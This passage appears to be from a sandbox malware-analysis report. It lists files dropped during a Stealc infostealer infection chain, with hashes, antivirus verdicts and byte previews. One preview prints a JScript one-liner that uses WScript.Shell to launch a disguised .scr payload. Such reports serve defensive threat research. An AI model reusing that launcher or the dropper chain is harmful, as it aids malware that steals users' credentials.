MD5:	9DC31D12B204DFF7E85D5AB4436F201D
SHA1:	FB9519DDBB35D1EF3D1956224359C93132A72DAE
SHA-256:	8E388AEE1456DCFDDFEFE79D0A9FCEFBC72707322B180A1DFF213B7468732F9C
SHA-512:	CA366EDDDF3699595BFBB6C6C2E1F62F38FDA4A411CBE60E2F1CFCC59D9D060F5F4040C57EF72643BE5ABFEA30B94E9E2A9E702BE4CECC38406E449AE4170231
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........$g........................d...........................T.......8...........T................z......................................................................................................eJ..............GenuineIntel............T.............$g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8580.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8384
Entropy (8bit):	3.6986377583459573
Encrypted:	false
SSDEEP:	192:R6l7wVeJxiA6JF6YYKF6MVtpgmfWCprF89bl+sf7Xm:R6lXJr6r6Y16ygmfW1l9fi
MD5:	26AE0CB2C080C4EECDA6FA6E0301E617
SHA1:	7D7AC519506CFD182C7C9981094AB19021BDAC4A
SHA-256:	4608AD3314AA9C7DF4C3E2BDB9EC0841F12FF85BC18AA56A92CF6680DB841FB2
SHA-512:	0C0C150DEFA07F8E8542FB6CFE6BE6C0D585043EAB233A067356E1AD2AC8D6172E4BF8F9B5B34B61BB4EBBF94AD5504484E0F90F4113011405A259ABCBE4F08A
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER85CF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4710
Entropy (8bit):	4.484119573232973
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI9FCWpW8VYWkYm8M4JeHFiE8o+q8vRmqjEEd:uIjfrI7zD7VZRJ5EfKs+EEd
MD5:	4190AA45D132EBB17822708B1D3089F2
SHA1:	FCF5C5F14338C16E4C6C148AD4E119A2808B25F2
SHA-256:	63364EFDC195BE9D3F34BB9289F4FC2ECFD8BED2207726AF008C3198471350B1
SHA-512:	C9B9F784037F83C8F07283A987841DAC5E4B878521722269D8E5CDB0AB2E0BE645ABD5F51DF98B36E3B6165F877C359BDFD388D72014A9D158AA9E871D673C09
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="568956" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.672871492983122
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5iXltLwvHFZo5uWAX+Ro6p4EkD5iXltUM:RiJBJHonwWDKaJkDQtMHFywWDKaJkDQr
MD5:	F14D533DEE94D2630510E81FC990C313
SHA1:	F5B6D491899D3C0C03C6DBF733DA1046577D6B16
SHA-256:	1653A193293DB5EDFE2266A0528F06B9349ADC58C06722F9C67F4BD90D8D641F
SHA-512:	61486D2F0A8448902DB98AB9CAE8CDE594AB169ACDD9A1F032B4AFBCE6035D3C4B6469E2BE4F59F28D0E891E3E4B637B0AF7D8E08DEE3FE328275F2D3C6E4832
Malicious:	true
Reputation:	unknown
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\EcoCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\O\"")

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\O

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	data
Category:	dropped
Size (bytes):	594650
Entropy (8bit):	7.9996649139256055
Encrypted:	true
SSDEEP:	12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
MD5:	4B0812FABC1BA34D8D45D28180F6C75F
SHA1:	B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
SHA-256:	73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
SHA-512:	7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
Malicious:	true
Reputation:	unknown
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dac4554719.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RDX123456[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.761223756666625
Encrypted:	false
SSDEEP:	6144:+tWC7xvtddofKKrybbuMY88Jc/oZ3ipoOvYcOCL7E6tt7thlp4:+RZtddofKKrzHPJ3ii0bL7E6t7Z2
MD5:	FBA8F56206955304B2A6207D9F5E8032
SHA1:	F84CBCC3E34F4D2C8FEA97C2562F937E1E20FE28
SHA-256:	11227EAD147B4154C7BD21B75D7F130B498C9AD9B520CA1814C5D6A688C89B1B
SHA-512:	56E3A0823A7ABE08E1C9918D8FA32C574208B462B423AB6BDE03345C654B75785FDC3180580C0D55280644B3A9574983E925F2125C2D340CF5E96B98237E99FA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@.......................................@.................................R....................................K...................................................................................text....B.......D.................. ..`.rdata..'%...`...&...H..............@..@.data............b...n..............@....reloc...K.......L..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2937856
Entropy (8bit):	6.5489912073067815
Encrypted:	false
SSDEEP:	49152:mlxmP5J2iVX8OHBTEjXx6ZSRjgLTS3gI4ix3bJpkjjQ:SAP5J2iVXbHBTEjXx6ZSpsTE/brkjj
MD5:	EA1B8BAFCB99BC660562BCB5F4CB63F3
SHA1:	CC97F694826C90CC8C8BD9666066EC491828D401
SHA-256:	C340F6CCCE063FD78345F78E8C1970A5D6E170192CDBD20E5B48884F7268BD37
SHA-512:	AAA32B5217DE08BAAB1AB09E2C22F5F71374AF6B02143E4B69341A66A0B1BB8E0B31E5DD4A4F33CE35CF4D2D1015EBF043CEF6F958BF695CB1B2F7CA2E8E2309
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@...........................0......_-...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...rdpqavxy. ........................@...vlmkkwpy....../.......,.............@....taggant.0..../.."....,.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.339215930674792
Encrypted:	false
SSDEEP:	6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
MD5:	68A99CF42959DC6406AF26E91D39F523
SHA1:	F11DB933A83400136DC992820F485E0B73F1B933
SHA-256:	C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
SHA-512:	7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0b44ippu[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1690066
Entropy (8bit):	7.978780081697768
Encrypted:	false
SSDEEP:	24576:Wa0E71YwbX4e2F4fOfq444sMDF6XR5w5ZVcs5I0wzvZBjQB/CtNJb/zUJH++QLS0:vYwD4e2FkCq/yYB5alxUNJLzyiegcIZ
MD5:	0F4AF03D2BA59B5C68066C95B41BFAD8
SHA1:	ECBB98B5BDE92B2679696715E49B2E35793F8F9F
SHA-256:	C263EBDC90FDB0A75D6570F178156C0BA665AC9F846B8172D7835733E5C3DE59
SHA-512:	EA4DE68E9EB4A9B69527A3924783B03B4B78BFFC547C53A0ECD74D0BD0B315D312AE2F17313085ACD317BE1E0D6F9A63E0089A8A20BF9FACC5157A9B8BEA95A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@.................................G.....@.................................4........@...n..............@.......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....n...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
